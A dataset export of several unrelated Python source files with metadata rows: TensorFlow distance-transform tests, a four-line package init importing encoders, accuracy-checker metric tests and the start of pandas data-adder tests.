distance = transform_utils.outer_distance_transform_movie(unique,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=1).shape, unique.shape)
bins = 3
distance = transform_utils.outer_distance_transform_movie(unique,
bins=bins)
distance = np.expand_dims(distance, axis=1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(distance.shape, unique.shape)
bins = 4
distance = transform_utils.outer_distance_transform_movie(unique,
bins=bins)
distance = np.expand_dims(distance, axis=1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(distance.shape, unique.shape)
def test_inner_distance_transform_2d(self):
for img in _generate_test_masks():
K.set_image_data_format('channels_last')
bins = None
distance = transform_utils.inner_distance_transform_2d(img,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=-1).shape,
img.shape)
bins = 3
distance = transform_utils.inner_distance_transform_2d(img,
bins=bins)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(np.expand_dims(distance, axis=-1).shape,
img.shape)
bins = 4
distance = transform_utils.inner_distance_transform_2d(img,
bins=bins)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(np.expand_dims(distance, axis=-1).shape,
img.shape)
K.set_image_data_format('channels_first')
img = np.rollaxis(img, -1, 1)
bins = None
distance = transform_utils.inner_distance_transform_2d(img,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape)
bins = 3
distance = transform_utils.inner_distance_transform_2d(img,
bins=bins)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape)
bins = 4
distance = transform_utils.inner_distance_transform_2d(img,
bins=bins)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape)
def test_inner_distance_transform_3d(self):
mask_stack = np.array(_generate_test_masks())
unique = np.zeros(mask_stack.shape)
for i, mask in enumerate(_generate_test_masks()):
unique[i] = label(mask)
K.set_image_data_format('channels_last')
bins = None
distance = transform_utils.inner_distance_transform_3d(unique,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=-1).shape, unique.shape)
bins = 3
distance = transform_utils.inner_distance_transform_3d(unique,
bins=bins)
distance = np.expand_dims(distance, axis=-1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(distance.shape, unique.shape)
bins = 4
distance = transform_utils.inner_distance_transform_3d(unique,
bins=bins)
distance = np.expand_dims(distance, axis=-1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(distance.shape, unique.shape)
K.set_image_data_format('channels_first')
unique = np.rollaxis(unique, -1, 1)
bins = None
distance = transform_utils.inner_distance_transform_3d(unique,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=1).shape, unique.shape)
bins = 3
distance = transform_utils.inner_distance_transform_3d(unique,
bins=bins)
distance = np.expand_dims(distance, axis=1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(distance.shape, unique.shape)
bins = 4
distance = transform_utils.inner_distance_transform_3d(unique,
bins=bins)
distance = np.expand_dims(distance, axis=1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(distance.shape, unique.shape)
def test_inner_distance_transform_movie(self):
mask_stack = np.array(_generate_test_masks())
unique = np.zeros(mask_stack.shape)
for i, mask in enumerate(_generate_test_masks()):
unique[i] = label(mask)
K.set_image_data_format('channels_last')
bins = None
distance = transform_utils.inner_distance_transform_movie(unique,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=-1).shape, unique.shape)
bins = 3
distance = transform_utils.inner_distance_transform_movie(unique,
bins=bins)
distance = np.expand_dims(distance, axis=-1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(distance.shape, unique.shape)
bins = 4
distance = transform_utils.inner_distance_transform_movie(unique,
bins=bins)
distance = np.expand_dims(distance, axis=-1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(distance.shape, unique.shape)
K.set_image_data_format('channels_first')
unique = np.rollaxis(unique, -1, 1)
bins = None
distance = transform_utils.inner_distance_transform_movie(unique,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=1).shape, unique.shape)
bins = 3
distance = transform_utils.inner_distance_transform_movie(unique,
bins=bins)
distance = np.expand_dims(distance, axis=1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(distance.shape, unique.shape)
bins = 4
distance = transform_utils.inner_distance_transform_movie(unique,
bins=bins)
distance = np.expand_dims(distance, axis=1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(distance.shape, unique.shape)
# Run via the TensorFlow test runner when executed directly as a script.
if __name__ == '__main__':
    test.main()
| 45.334081
| 80
| 0.547356
| 2,211
| 20,219
| 4.786522
| 0.103121
| 0.125295
| 0.074837
| 0.068034
| 0.850987
| 0.850515
| 0.846735
| 0.841066
| 0.841066
| 0.841066
| 0
| 0.021497
| 0.351204
| 20,219
| 445
| 81
| 45.435955
| 0.785257
| 0.065582
| 0
| 0.889213
| 0
| 0
| 0.01315
| 0
| 0
| 0
| 0
| 0
| 0.221574
| 1
| 0.029155
| false
| 0
| 0.023324
| 0
| 0.061224
| 0.002915
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fef452f581732dafe578a3766f822c6eee26e284
| 130
|
py
|
Python
|
src/mbinobs/__init__.py
|
ManuelMaM/IPfuscation
|
3d7ba78b2b152ae104e1c9ed1632c15aa02c35bb
|
[
"MIT"
] | null | null | null |
src/mbinobs/__init__.py
|
ManuelMaM/IPfuscation
|
3d7ba78b2b152ae104e1c9ed1632c15aa02c35bb
|
[
"MIT"
] | null | null | null |
src/mbinobs/__init__.py
|
ManuelMaM/IPfuscation
|
3d7ba78b2b152ae104e1c9ed1632c15aa02c35bb
|
[
"MIT"
] | null | null | null |
from mbinobs.ipv4 import _encode
from mbinobs.ipv6 import _encode
from mbinobs.mac import _encode
from mbinobs.uuid import _encode
| 32.5
| 32
| 0.853846
| 20
| 130
| 5.35
| 0.4
| 0.411215
| 0.448598
| 0.64486
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017391
| 0.115385
| 130
| 4
| 33
| 32.5
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
feff6b461ccc4fbea5586ab40d4f88d90a93b00c
| 21,301
|
py
|
Python
|
demos/python_demos/accuracy_checker/tests/test_metric_evaluator.py
|
undeadinu/open_model_zoo
|
db4757112bfe3bd66ad4977fcfec08a55ef02d1f
|
[
"Apache-2.0"
] | 1
|
2019-10-19T23:43:48.000Z
|
2019-10-19T23:43:48.000Z
|
demos/python_demos/accuracy_checker/tests/test_metric_evaluator.py
|
undeadinu/open_model_zoo
|
db4757112bfe3bd66ad4977fcfec08a55ef02d1f
|
[
"Apache-2.0"
] | null | null | null |
demos/python_demos/accuracy_checker/tests/test_metric_evaluator.py
|
undeadinu/open_model_zoo
|
db4757112bfe3bd66ad4977fcfec08a55ef02d1f
|
[
"Apache-2.0"
] | 1
|
2019-10-19T23:43:52.000Z
|
2019-10-19T23:43:52.000Z
|
"""
Copyright (c) 2018 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pytest
from accuracy_checker.config import ConfigError
from accuracy_checker.metrics import ClassificationAccuracy, MetricsExecutor
from accuracy_checker.representation import (ClassificationAnnotation, ClassificationPrediction, ContainerAnnotation,
ContainerPrediction, DetectionAnnotation, DetectionPrediction)
from tests.test_detection_metrics import DummyDataset
class TestMetric:
    """Tests for ``MetricsExecutor``.

    Covers config validation (missing/empty/undefined metric entries),
    annotation/prediction source selection for Container representations,
    and the ``accuracy`` / ``accuracy_per_class`` metric results.
    """

    def setup_method(self):
        self.module = 'accuracy_checker.metrics.metric_evaluator'

    def test_missed_metrics_raises_config_error_exception(self):
        config = {'annotation': 'custom'}

        with pytest.raises(ConfigError):
            MetricsExecutor(config, None)

    def test_missed_metrics_raises_config_error_exception_with_custom_name(self):
        config = {'name': 'some_name', 'annotation': 'custom'}

        with pytest.raises(ConfigError):
            MetricsExecutor(config, None)

    def test_empty_metrics_raises_config_error_exception(self):
        config = {'annotation': 'custom', 'metrics': []}

        with pytest.raises(ConfigError):
            MetricsExecutor(config, None)

    def test_metrics_with_empty_entry_raises_config_error_exception(self):
        config = {'annotation': 'custom', 'metrics': [{}]}

        with pytest.raises(ConfigError):
            MetricsExecutor(config, None)

    def test_missed_metric_type_raises_config_error_exception(self):
        config = {'annotation': 'custom', 'metrics': [{'undefined': ''}]}

        with pytest.raises(ConfigError):
            MetricsExecutor(config, None)

    def test_undefined_metric_type_raises_config_error_exception(self):
        config = {'annotation': 'custom', 'metrics': [{'type': ''}]}

        with pytest.raises(ConfigError):
            MetricsExecutor(config, None)

    def test_accuracy_arguments(self):
        config = {'annotation': 'custom', 'metrics': [{'type': 'accuracy', 'top_k': 1}]}

        dispatcher = MetricsExecutor(config, None)

        assert len(dispatcher._metrics) == 1
        _, accuracy_metric, _, _, _ = dispatcher._metrics[0]
        assert isinstance(accuracy_metric, ClassificationAccuracy)
        assert accuracy_metric.top_k == 1

    def test_accuracy_with_several_annotation_source_raises_config_error_exception(self):
        config = {'annotation': 'custom',
                  'metrics': [{'type': 'accuracy', 'top_k': 1, 'annotation_source': 'annotation1, annotation2'}]}

        with pytest.raises(ConfigError):
            MetricsExecutor(config, None)

    def test_accuracy_with_several_prediction_source_raises_value_error_exception(self):
        config = {'annotation': 'custom',
                  'metrics': [{'type': 'accuracy', 'top_k': 1, 'prediction_source': 'prediction1, prediction2'}]}

        with pytest.raises(ConfigError):
            MetricsExecutor(config, None)

    def test_accuracy_on_container_with_wrong_annotation_source_name_raise_config_error_exception(self):
        annotations = [ContainerAnnotation({'annotation': ClassificationAnnotation('identifier', 3)})]
        predictions = [ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])]
        # 'a' does not match the container's only key ('annotation').
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 1, 'annotation_source': 'a'}]}

        dispatcher = MetricsExecutor(config, None)
        with pytest.raises(ConfigError):
            dispatcher.update_metrics_on_batch(annotations, predictions)

    def test_accuracy_with_wrong_annotation_type_raise_config_error_exception(self):
        annotations = [DetectionAnnotation('identifier', 3)]
        predictions = [ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])]
        config = {'annotation': 'mocked', 'metrics': [
            {'type': 'accuracy', 'top_k': 1}]}

        dispatcher = MetricsExecutor(config, None)
        with pytest.raises(ConfigError):
            dispatcher.update_metrics_on_batch(annotations, predictions)

    def test_accuracy_with_unsupported_annotations_in_container_raise_config_error_exception(self):
        annotations = [ContainerAnnotation({'annotation': DetectionAnnotation('identifier', 3)})]
        predictions = [ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])]
        config = {'annotation': 'mocked', 'metrics': [
            {'type': 'accuracy', 'top_k': 1}]}

        dispatcher = MetricsExecutor(config, None)
        with pytest.raises(ConfigError):
            dispatcher.update_metrics_on_batch(annotations, predictions)

    def test_accuracy_with_unsupported_type_of_annotation_as_annotation_source_for_container_raise_config_error_exception(self):
        annotations = [ContainerAnnotation({'annotation': DetectionAnnotation('identifier', 3)})]
        predictions = [ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])]
        config = {'annotation': 'mocked', 'metrics': [
            {'type': 'accuracy', 'top_k': 1, 'annotation_source': 'annotation'}]}

        dispatcher = MetricsExecutor(config, None)
        with pytest.raises(ConfigError):
            dispatcher.update_metrics_on_batch(annotations, predictions)

    def test_accuracy_on_annotation_container_with_several_suitable_representations_config_value_error_exception(self):
        # Two equally-suitable annotations and no explicit source: ambiguous.
        annotations = [ContainerAnnotation({'annotation1': ClassificationAnnotation('identifier', 3), 'annotation2': ClassificationAnnotation('identifier', 3)})]
        predictions = [ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])]
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 1}]}

        dispatcher = MetricsExecutor(config, None)
        with pytest.raises(ConfigError):
            dispatcher.update_metrics_on_batch(annotations, predictions)

    def test_accuracy_with_wrong_prediction_type_raise_config_error_exception(self):
        annotations = [ClassificationAnnotation('identifier', 3)]
        predictions = [DetectionPrediction('identifier', [1.0, 1.0, 1.0, 4.0])]
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 1}]}

        dispatcher = MetricsExecutor(config, None)
        with pytest.raises(ConfigError):
            dispatcher.update_metrics_on_batch(annotations, predictions)

    def test_accuracy_with_unsupported_prediction_in_container_raise_config_error_exception(self):
        annotations = [ClassificationAnnotation('identifier', 3)]
        predictions = [ContainerPrediction({'prediction': DetectionPrediction('identifier', [1.0, 1.0, 1.0, 4.0])})]
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 1}]}

        dispatcher = MetricsExecutor(config, None)
        with pytest.raises(ConfigError):
            dispatcher.update_metrics_on_batch(annotations, predictions)

    def test_accuracy_with_unsupported_type_of_prediction_as_prediction_source_for_container_raise_config_error_exception(self):
        annotations = [ClassificationAnnotation('identifier', 3)]
        predictions = [ContainerPrediction({'prediction': DetectionPrediction('identifier', [1.0, 1.0, 1.0, 4.0])})]
        config = {'annotation': 'mocked', 'metrics': [
            {'type': 'accuracy', 'top_k': 1, 'prediction_source': 'prediction'}]}

        dispatcher = MetricsExecutor(config, None)
        with pytest.raises(ConfigError):
            dispatcher.update_metrics_on_batch(annotations, predictions)

    def test_accuracy_on_prediction_container_with_several_suitable_representations_raise_config_error_exception(self):
        annotations = [ClassificationAnnotation('identifier', 3)]
        # Two equally-suitable predictions and no explicit source: ambiguous.
        predictions = [ContainerPrediction({'prediction1': ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0]),
                                            'prediction2': ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])})]
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 1}]}

        dispatcher = MetricsExecutor(config, None)
        with pytest.raises(ConfigError):
            dispatcher.update_metrics_on_batch(annotations, predictions)

    def test_complete_accuracy(self):
        annotations = [ClassificationAnnotation('identifier', 3)]
        predictions = [ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])]
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 1}]}

        dispatcher = MetricsExecutor(config, None)
        dispatcher.update_metrics_on_batch(annotations, predictions)

        for _, evaluation_result in dispatcher.iterate_metrics(annotations, predictions):
            assert evaluation_result.name == 'accuracy'
            assert evaluation_result.evaluated_value == pytest.approx(1.0)
            assert evaluation_result.reference_value is None
            assert evaluation_result.threshold is None

    def test_complete_accuracy_with_container_default_sources(self):
        annotations = [ContainerAnnotation({'a': ClassificationAnnotation('identifier', 3)})]
        predictions = [ContainerPrediction({'p': ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])})]
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 1}]}

        dispatcher = MetricsExecutor(config, None)
        dispatcher.update_metrics_on_batch(annotations, predictions)

        for _, evaluation_result in dispatcher.iterate_metrics(annotations, predictions):
            assert evaluation_result.name == 'accuracy'
            assert evaluation_result.evaluated_value == pytest.approx(1.0)
            assert evaluation_result.reference_value is None
            assert evaluation_result.threshold is None

    def test_complete_accuracy_with_container_sources(self):
        annotations = [ContainerAnnotation({'a': ClassificationAnnotation('identifier', 3)})]
        predictions = [ContainerPrediction({'p': ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])})]
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 1, 'annotation_source': 'a', 'prediction_source': 'p'}]}

        dispatcher = MetricsExecutor(config, None)
        dispatcher.update_metrics_on_batch(annotations, predictions)

        for _, evaluation_result in dispatcher.iterate_metrics(annotations, predictions):
            assert evaluation_result.name == 'accuracy'
            assert evaluation_result.evaluated_value == pytest.approx(1.0)
            assert evaluation_result.reference_value is None
            assert evaluation_result.threshold is None

    def test_zero_accuracy(self):
        annotations = [ClassificationAnnotation('identifier', 2)]
        predictions = [ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])]
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 1}]}

        dispatcher = MetricsExecutor(config, None)

        # FIX: the variables are already batch lists; the original wrapped
        # them in another list, unlike every sibling test.
        for _, evaluation_result in dispatcher.iterate_metrics(annotations, predictions):
            assert evaluation_result.name == 'accuracy'
            assert evaluation_result.evaluated_value == 0.0
            assert evaluation_result.reference_value is None
            assert evaluation_result.threshold is None

    def test_complete_accuracy_top_3(self):
        annotations = [ClassificationAnnotation('identifier', 3)]
        predictions = [ClassificationPrediction('identifier', [1.0, 3.0, 4.0, 2.0])]
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 3}]}

        dispatcher = MetricsExecutor(config, None)
        dispatcher.update_metrics_on_batch(annotations, predictions)

        for _, evaluation_result in dispatcher.iterate_metrics(annotations, predictions):
            assert evaluation_result.name == 'accuracy'
            assert evaluation_result.evaluated_value == pytest.approx(1.0)
            assert evaluation_result.reference_value is None
            assert evaluation_result.threshold is None

    def test_zero_accuracy_top_3(self):
        annotations = [ClassificationAnnotation('identifier', 3)]
        predictions = [ClassificationPrediction('identifier', [5.0, 3.0, 4.0, 1.0])]
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 3}]}

        dispatcher = MetricsExecutor(config, None)

        for _, evaluation_result in dispatcher.iterate_metrics(annotations, predictions):
            assert evaluation_result.name == 'accuracy'
            assert evaluation_result.evaluated_value == 0.0
            assert evaluation_result.reference_value is None
            assert evaluation_result.threshold is None

    def test_reference_is_10_by_config(self):
        annotations = [ClassificationAnnotation('identifier', 3)]
        predictions = [ClassificationPrediction('identifier', [5.0, 3.0, 4.0, 1.0])]
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 3, 'reference': 10}]}

        dispatcher = MetricsExecutor(config, None)

        for _, evaluation_result in dispatcher.iterate_metrics(annotations, predictions):
            assert evaluation_result.name == 'accuracy'
            assert evaluation_result.evaluated_value == 0.0
            assert evaluation_result.reference_value == 10
            assert evaluation_result.threshold is None

    def test_threshold_is_10_by_config(self):
        annotations = [ClassificationAnnotation('identifier', 3)]
        predictions = [ClassificationPrediction('identifier', [5.0, 3.0, 4.0, 1.0])]
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 3, 'threshold': 10}]}

        dispatcher = MetricsExecutor(config, None)

        # FIX: the variables are already batch lists; the original wrapped
        # them in another list, unlike every sibling test.
        for _, evaluation_result in dispatcher.iterate_metrics(annotations, predictions):
            assert evaluation_result.name == 'accuracy'
            assert evaluation_result.evaluated_value == 0.0
            assert evaluation_result.reference_value is None
            assert evaluation_result.threshold == 10

    def test_classification_per_class_accuracy_fully_zero_prediction(self):
        annotation = ClassificationAnnotation('identifier', 0)
        prediction = ClassificationPrediction('identifier', [1.0, 2.0])
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy_per_class', 'top_k': 1}]}
        dataset = DummyDataset(label_map={0: '0', 1: '1'})

        dispatcher = MetricsExecutor(config, dataset)
        dispatcher.update_metrics_on_batch([annotation], [prediction])

        for _, evaluation_result in dispatcher.iterate_metrics([annotation], [prediction]):
            assert evaluation_result.name == 'accuracy_per_class'
            assert len(evaluation_result.evaluated_value) == 2
            assert evaluation_result.evaluated_value[0] == pytest.approx(0.0)
            assert evaluation_result.evaluated_value[1] == pytest.approx(0.0)
            assert evaluation_result.reference_value is None
            assert evaluation_result.threshold is None

    def test_classification_per_class_accuracy_particually_zero_prediction(self):
        annotation = [ClassificationAnnotation('identifier', 1)]
        prediction = [ClassificationPrediction('identifier', [1.0, 2.0])]
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy_per_class', 'top_k': 1}]}
        dataset = DummyDataset(label_map={0: '0', 1: '1'})

        dispatcher = MetricsExecutor(config, dataset)
        dispatcher.update_metrics_on_batch(annotation, prediction)

        for _, evaluation_result in dispatcher.iterate_metrics(annotation, prediction):
            assert evaluation_result.name == 'accuracy_per_class'
            assert len(evaluation_result.evaluated_value) == 2
            assert evaluation_result.evaluated_value[0] == pytest.approx(0.0)
            assert evaluation_result.evaluated_value[1] == pytest.approx(1.0)
            assert evaluation_result.reference_value is None
            assert evaluation_result.threshold is None

    def test_classification_per_class_accuracy_complete_prediction(self):
        annotation = [ClassificationAnnotation('identifier_1', 1), ClassificationAnnotation('identifier_2', 0)]
        prediction = [ClassificationPrediction('identifier_1', [1.0, 2.0]), ClassificationPrediction('identifier_2', [2.0, 1.0])]
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy_per_class', 'top_k': 1}]}
        dataset = DummyDataset(label_map={0: '0', 1: '1'})

        dispatcher = MetricsExecutor(config, dataset)
        dispatcher.update_metrics_on_batch(annotation, prediction)

        for _, evaluation_result in dispatcher.iterate_metrics(annotation, prediction):
            assert evaluation_result.name == 'accuracy_per_class'
            assert len(evaluation_result.evaluated_value) == 2
            assert evaluation_result.evaluated_value[0] == pytest.approx(1.0)
            assert evaluation_result.evaluated_value[1] == pytest.approx(1.0)
            assert evaluation_result.reference_value is None
            assert evaluation_result.threshold is None

    def test_classification_per_class_accuracy_particual_prediction(self):
        annotation = [ClassificationAnnotation('identifier_1', 1), ClassificationAnnotation('identifier_2', 0), ClassificationAnnotation('identifier_3', 0)]
        prediction = [ClassificationPrediction('identifier_1', [1.0, 2.0]), ClassificationPrediction('identifier_2', [2.0, 1.0]), ClassificationPrediction('identifier_3', [1.0, 5.0])]
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy_per_class', 'top_k': 1}]}
        dataset = DummyDataset(label_map={0: '0', 1: '1'})

        dispatcher = MetricsExecutor(config, dataset)
        dispatcher.update_metrics_on_batch(annotation, prediction)

        for _, evaluation_result in dispatcher.iterate_metrics(annotation, prediction):
            assert evaluation_result.name == 'accuracy_per_class'
            assert len(evaluation_result.evaluated_value) == 2
            assert evaluation_result.evaluated_value[0] == pytest.approx(0.5)
            assert evaluation_result.evaluated_value[1] == pytest.approx(1.0)
            assert evaluation_result.reference_value is None
            assert evaluation_result.threshold is None

    def test_classification_per_class_accuracy_prediction_top3_zero(self):
        annotation = [ClassificationAnnotation('identifier_1', 0), ClassificationAnnotation('identifier_2', 1)]
        prediction = [ClassificationPrediction('identifier_1', [1.0, 2.0, 3.0, 4.0]), ClassificationPrediction('identifier_2', [2.0, 1.0, 3.0, 4.0])]
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy_per_class', 'top_k': 3}]}
        dataset = DummyDataset(label_map={0: '0', 1: '1', 2: '2', 3: '3'})

        dispatcher = MetricsExecutor(config, dataset)
        dispatcher.update_metrics_on_batch(annotation, prediction)

        for _, evaluation_result in dispatcher.iterate_metrics(annotation, prediction):
            assert evaluation_result.name == 'accuracy_per_class'
            assert len(evaluation_result.evaluated_value) == 4
            assert evaluation_result.evaluated_value[0] == pytest.approx(0.0)
            assert evaluation_result.evaluated_value[1] == pytest.approx(0.0)
            assert evaluation_result.evaluated_value[2] == pytest.approx(0.0)
            assert evaluation_result.evaluated_value[3] == pytest.approx(0.0)
            assert evaluation_result.reference_value is None
            assert evaluation_result.threshold is None

    def test_classification_per_class_accuracy_prediction_top3(self):
        annotation = [ClassificationAnnotation('identifier_1', 1), ClassificationAnnotation('identifier_2', 1)]
        prediction = [ClassificationPrediction('identifier_1', [1.0, 2.0, 3.0, 4.0]), ClassificationPrediction('identifier_2', [2.0, 1.0, 3.0, 4.0])]
        config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy_per_class', 'top_k': 3}]}
        dataset = DummyDataset(label_map={0: '0', 1: '1', 2: '2', 3: '3'})

        dispatcher = MetricsExecutor(config, dataset)
        dispatcher.update_metrics_on_batch(annotation, prediction)

        for _, evaluation_result in dispatcher.iterate_metrics(annotation, prediction):
            assert evaluation_result.name == 'accuracy_per_class'
            assert len(evaluation_result.evaluated_value) == 4
            assert evaluation_result.evaluated_value[0] == pytest.approx(0.0)
            assert evaluation_result.evaluated_value[1] == pytest.approx(0.5)
            assert evaluation_result.evaluated_value[2] == pytest.approx(0.0)
            assert evaluation_result.evaluated_value[3] == pytest.approx(0.0)
            assert evaluation_result.reference_value is None
            assert evaluation_result.threshold is None
| 56.954545
| 183
| 0.691611
| 2,261
| 21,301
| 6.270677
| 0.070765
| 0.097052
| 0.102412
| 0.063479
| 0.882494
| 0.866201
| 0.854563
| 0.851107
| 0.836225
| 0.823459
| 0
| 0.024032
| 0.191259
| 21,301
| 373
| 184
| 57.107239
| 0.798978
| 0.026384
| 0
| 0.703448
| 0
| 0
| 0.115873
| 0.001979
| 0
| 0
| 0
| 0
| 0.258621
| 1
| 0.113793
| false
| 0
| 0.017241
| 0
| 0.134483
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3a058d570582db619236f2283e727e570f20b2db
| 12,614
|
py
|
Python
|
parser/adder_Tests.py
|
musashin/DashBoardTest
|
50f1be6ab9a53b1864beea2756eca6c7f8d9b40f
|
[
"MIT"
] | null | null | null |
parser/adder_Tests.py
|
musashin/DashBoardTest
|
50f1be6ab9a53b1864beea2756eca6c7f8d9b40f
|
[
"MIT"
] | null | null | null |
parser/adder_Tests.py
|
musashin/DashBoardTest
|
50f1be6ab9a53b1864beea2756eca6c7f8d9b40f
|
[
"MIT"
] | null | null | null |
import unittest
from parser import adder
import pandas as pd
from datetime import datetime
class AdderTests(unittest.TestCase):
    """
    Test in normal conditions

    Each test accumulates weekly-indexed project DataFrames into a running
    ``total`` frame via adder.add_project_data and compares the result
    against a hand-computed expectation: the 'X' and 'Y' columns are summed
    across projects while 'CPI' is averaged.

    NOTE(review): column_to_average=('CPI') passes just the string 'CPI' --
    parentheses without a trailing comma do not create a tuple. Confirm the
    adder API expects a bare column name here.
    """
    def test_simple_addition(self):
        # Two projects over identical invoice weeks: element-wise sums for
        # X/Y, per-week average of the two CPI values.
        total = pd.DataFrame(columns=['X', 'Y', 'CPI'], dtype=float)
        date_today = datetime.now()
        invoice_weeks = pd.date_range(date_today, periods=3, freq='W')
        project1 = pd.DataFrame(index=invoice_weeks, data= {'X': [40, 50, 60],
                                                            'Y': [10000, 20000, 30000],
                                                            'CPI': [10, 20, 30]})
        project2 = pd.DataFrame(index=invoice_weeks, data={'X': [10, 10, 10],
                                                           'Y': [30, 40, 50],
                                                           'CPI': [100, 20, 100]})
        for idx, project in enumerate((project1, project2)):
            adder.add_project_data(total, project, idx, column_to_average=('CPI'))
        expected_result = pd.DataFrame(index=invoice_weeks, data={'X': [50, 60, 70],
                                                                  'Y': [10030, 20040, 30050],
                                                                  'CPI': [55, 20, 65]}, dtype=float)
        # Columns are put in sorted order because DataFrame.equals is
        # sensitive to column ordering.
        expected_result.sort_index(inplace=True, axis=1)
        self.assertTrue(total.equals(expected_result))
    def test_multiple_simple_addition(self):
        # Adding the same project five times: the summed X column is
        # multiplied by 5 while the averaged CPI column stays unchanged.
        total = pd.DataFrame(columns=['X', 'CPI'], dtype=float)
        date_today = datetime.now()
        invoice_weeks = pd.date_range(date_today, periods=3, freq='W')
        project = pd.DataFrame(index=invoice_weeks, data={'X': [10, 20, 30],
                                                          'CPI': [10, 20, 30]})
        for idx in range(5):
            adder.add_project_data(total, project, idx, column_to_average=('CPI'))
        expected_result = pd.DataFrame(index=invoice_weeks, data={'X': [10*5, 20*5, 30*5],
                                                                  'CPI': [10, 20, 30]}, dtype=float)
        expected_result.sort_index(inplace=True, axis=1)
        self.assertTrue(total.equals(expected_result))
    def test_finishing_late_no_overlap(self):
        # project2 starts 3 weeks after project1's last invoice week, so the
        # index ranges are disjoint: early weeks hold project1 values only
        # and the late weeks combine project2 with project1's carried-over
        # final row (X stays at 70, Y at 30000 + project2's Y).
        total = pd.DataFrame(columns=['X', 'Y', 'CPI'], dtype=float)
        date_today = datetime.now()
        project1_invoice_weeks = pd.date_range(date_today, periods=3, freq='W')
        project1 = pd.DataFrame(index=project1_invoice_weeks, data={'X': [40, 50, 60],
                                                                    'Y': [10000, 20000, 30000],
                                                                    'CPI': [10, 20, 30]})
